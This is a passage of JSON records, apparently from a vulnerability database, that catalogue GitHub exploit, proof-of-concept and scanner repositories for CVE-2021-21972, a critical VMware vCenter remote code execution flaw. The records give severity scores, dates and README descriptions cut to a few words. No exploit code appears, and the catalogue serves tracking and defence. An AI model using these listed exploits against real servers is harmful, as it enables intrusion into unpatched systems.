"LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-21973"], "modified": "2022-02-12T11:51:32", "id": "52C8ABEA-CBB9-5201-A615-BBC5769F9BC3", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-07T20:28:25", "description": "# CVE-2021-21972\n<b>[CVE-2021-21972] VMware vSphere Client Unaut...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-03T23:03:11", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-21973"], "modified": "2022-02-12T11:51:32", "id": "D359E448-87C6-5DAB-AC08-9E7782F4EBD1", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-06T09:04:59", "description": "<b>[CVE-2021-21972] VMware vSphere Client Unauthorized File Uplo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-06T10:38:40", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21973", "CVE-2021-21972"], "modified": "2022-01-06T08:29:25", "id": "69E38911-1BFE-5166-9FD4-EC8F4997E3DE", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:18:47", "description": "# Contains Custom NSE scripts \n\n\n# CVE-2020-0796\nNSE script to d...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-11T17:51:29", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-1350", "CVE-2021-21972", "CVE-2021-21973", "CVE-2021-34473"], "modified": "2022-03-23T17:15:09", "id": "F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:17:52", "description": "# VMware_vCenter_CVE-2021-21972\nVMware vCenter CVE-2021-21972 Re...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-27T10:27:04", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-14T04:48:32", "id": "4AE4DA23-9B19-512A-AEC4-4DDC3C1650FC", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-27T06:05:33", "description": "# cve-2021-21972\n\n##\u4f7f\u7528\u8bf4\u660e...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-03T03:01:46", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-12-27T05:40:13", "id": "502CC8C9-71B8-5BB1-9D39-D1EAA861ABDA", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:19:37", "description": "# CVE-2021-21972\nCVE-2021-21972\n\n\n# Works On\n\n- VMware-VCSA-all-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-03T12:09:53", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-04-03T12:10:03", "id": "64EF6553-4D22-526B-A1CC-09212DBD7625", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:19:59", "description": "# westone-CVE-2021-21972-scanner \nVMware vCenter Server remote ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-25T03:19:25", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-20T07:55:11", "id": "0C366CAA-5DE0-5E1E-98BD-503473AFAFA2", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:30:48", "description": "**vsphereyeeter.sh** is an automated bash script to exploit vuln...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-25T18:22:34", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-08-27T21:28:19", "id": "3738D917-F6B1-5AFF-8F77-DA5EF5276D89", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:17:56", "description": "# Usage:CVE-2021-21972.py [option]\n- -u or --url\uff1a\u76ee\u6807url\n- -t or -...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-25T09:28:17", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-02-26T01:57:28", "id": "6B607D21-8F2D-50F9-8E60-BC95F2E252E1", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:17:57", "description": "# CVE-2021-21972\nCVE-2021-21972\n\nTested against VMware VCSA 6.7\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-25T13:04:37", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-07-14T14:37:02", "id": "4A85B104-7AB3-5334-BEAB-DD8CB273CBAF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:17:59", "description": "# CVE-2021-21972\n\n### \u6f0f\u6d1e\u63cf\u8ff0\n\ncve-2021-21972\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\n\n\u5177\u6709443\u7aef\u53e3\u8bbf\u95ee\u6743\u9650\u7684\u6076\u610f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-24T13:19:41", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-11-22T11:25:34", "id": "7B41BE78-EA76-5BF3-A0BC-250C3D753626", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:21:33", "description": "# vSphereyeeter\nPOC exploit for CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-22T14:00:38", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-05-11T17:37:16", "id": "0D23F068-44DE-5104-B4F1-A0E53C83D60F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-04T07:20:54", "description": "# CVE-2021-21972-vCenter-6.5-7.0-RCE-POC\n### poc Jus...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T09:56:21", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-05-04T06:18:45", "id": "C98B31E5-B85D-50EE-9596-F00F1B89A800", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-22T18:01:43", "description": "# CVE-2021-21972\n\n## Description \nThe vSphere Client (HTML5) co...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-25T05:16:38", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-03-22T13:32:13", "id": "5711B5D3-F257-5128-8C1A-908EACEAEC29", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-28T01:06:07", "description": "# CVE-2021-21972\nCVE-2021-21972 Unauthorized RCE in VMware vCent...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-07T16:30:36", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-04-27T13:08:53", "id": "46CBB13F-0CFD-5D36-BDAB-38B8D306B155", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-12T12:18:18", "description": "# CVE-2021-21972\nProof of Concept Exploit for vCenter CVE-2021-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T16:31:34", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-05-11T18:32:07", "id": "55989E2C-3C33-5EB8-AADF-9B52B80F48D6", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-09T21:58:09", "description": "# CVE-2021-21972\nNmap script to check vulnerability CVE-2021-219...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-26T21:30:50", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-05-09T14:18:44", "id": "626E6774-0ACC-594C-BB61-E89F8F034B11", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-06T08:59:17", "description": "# CVE-2021-21972 (checker)\nVMware vCenter Server CVE-2021-21972 ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-25T05:10:06", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-01-06T08:18:24", "id": "50618611-3CA9-5185-8ED3-53532D99D4B7", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-18T10:24:59", "description": "## \u4f7f\u7528\u65b9\u6cd5&\u514d\u8d23\u58f0\u660e\r\n\r\nVMware vCenter Server\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e (CVE-2021-21972)\r\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T10:16:20", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": 